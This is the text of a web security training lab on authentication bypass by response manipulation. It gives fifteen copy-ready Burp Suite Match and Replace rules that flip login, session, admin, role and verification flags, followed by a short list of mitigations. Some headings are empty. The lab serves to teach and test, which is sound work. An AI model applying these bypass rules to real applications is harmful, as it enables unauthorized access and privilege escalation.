Lab 5: Authentication Bypass

Authentication bypass via response manipulation vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates authentication bypass vulnerabilities where attackers can use Burp Suite to modify authentication responses and bypass login controls.

Objective: Understand how authentication bypass attacks work and how to exploit them using Burp Suite.

Authentication System
User Login

Test authentication with response manipulation:

Session Check

Check session validity:

Permission Check

Check user permissions:

Authentication Bypass Tester
⚠️ Authentication Bypass Warning

This lab demonstrates authentication bypass vulnerabilities:

  • Login Bypass - Bypass login authentication
  • Session Bypass - Bypass session validation
  • Permission Bypass - Bypass permission checks
  • Admin Escalation - Escalate to admin privileges
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "authenticated":false"authenticated":true
  • "admin":false"admin":true
  • "status":"failed""status":"success"
  • "permitted":false"permitted":true
Authentication Bypass Rules
Login Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"authenticated\":false", "string_replace": "\"authenticated\":true" }
Admin Escalation
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"admin\":false", "string_replace": "\"admin\":true" }
Status Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"failed\"", "string_replace": "\"status\":\"success\"" }
Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permitted\":false", "string_replace": "\"permitted\":true" }
Session Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"valid\":false", "string_replace": "\"valid\":true" }
User Type Escalation
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"user_type\":\"user\"", "string_replace": "\"user_type\":\"admin\"" }
Vulnerability Details
  • Type: Authentication Bypass
  • Severity: High
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of authentication responses
Attack Vectors
  • Login Bypass: Bypass login authentication
  • Session Bypass: Bypass session validation
  • Permission Bypass: Bypass permission checks
  • Admin Escalation: Escalate to admin privileges
Authentication Bypass Examples

Use these Burp Suite Match and Replace rules to exploit authentication bypass vulnerabilities:

1. Login Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"authenticated\":false", "string_replace": "\"authenticated\":true" } // This rule bypasses login authentication // Example: "authenticated":false becomes "authenticated":true
2. Admin Escalation:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"admin\":false", "string_replace": "\"admin\":true" } // This rule escalates user to admin // Example: "admin":false becomes "admin":true
3. Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"failed\"", "string_replace": "\"status\":\"success\"" } // This rule bypasses status validation // Example: "status":"failed" becomes "status":"success"
4. Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permitted\":false", "string_replace": "\"permitted\":true" } // This rule bypasses permission checks // Example: "permitted":false becomes "permitted":true
5. Session Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"valid\":false", "string_replace": "\"valid\":true" } // This rule bypasses session validation // Example: "valid":false becomes "valid":true
6. User Type Escalation:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"user_type\":\"user\"", "string_replace": "\"user_type\":\"admin\"" } // This rule escalates user type to admin // Example: "user_type":"user" becomes "user_type":"admin"
7. Session Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"expired\"", "string_replace": "\"status\":\"active\"" } // This rule bypasses session expiration // Example: "status":"expired" becomes "status":"active"
8. Access Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"denied\"", "string_replace": "\"status\":\"allowed\"" } // This rule bypasses access denial // Example: "status":"denied" becomes "status":"allowed"
9. Message Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"message\":\"Invalid credentials\"", "string_replace": "\"message\":\"Login successful\"" } // This rule changes error messages // Example: "Invalid credentials" becomes "Login successful"
10. Simple Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": true, "rule_type": "response_body", "string_match": "{\"status\":\"0\"}", "string_replace": "{\"status\":\"1\",\"user_type\":\"admin\"}" } // This rule bypasses simple status // Example: {"status":"0"} becomes {"status":"1","user_type":"admin"}
11. Header Manipulation:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": true, "rule_type": "request_header", "string_match": "{\"admin\", \"false\", admin_id \"0\"}", "string_replace": "{\"admin\", \"true\", admin_id \"1\"}" } // This rule manipulates request headers // Example: {"admin", "false", admin_id "0"} becomes {"admin", "true", admin_id "1"}
12. Verification Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verify\":false", "string_replace": "\"verify\":true" } // This rule bypasses verification checks // Example: "verify":false becomes "verify":true
13. Email Verification Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"email_verified\":false", "string_replace": "\"email_verified\":true" } // This rule bypasses email verification // Example: "email_verified":false becomes "email_verified":true
14. Account Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"account_active\":false", "string_replace": "\"account_active\":true" } // This rule bypasses account status checks // Example: "account_active":false becomes "account_active":true
15. Role Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"role\":\"guest\"", "string_replace": "\"role\":\"admin\"" } // This rule bypasses role restrictions // Example: "role":"guest" becomes "role":"admin"
Real-World Attack Scenarios
Mitigation Strategies
  • Implement server-side authentication validation
  • Use response integrity checks and signatures
  • Implement proper session management
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual authentication patterns
  • Implement proper input validation
  • Use multi-factor authentication
  • Implement proper error handling
  • Educate users about security threats
  • Use secure session tokens
  • Implement proper logging and monitoring
  • Use authentication bypass detection tools
  • Implement proper audit trails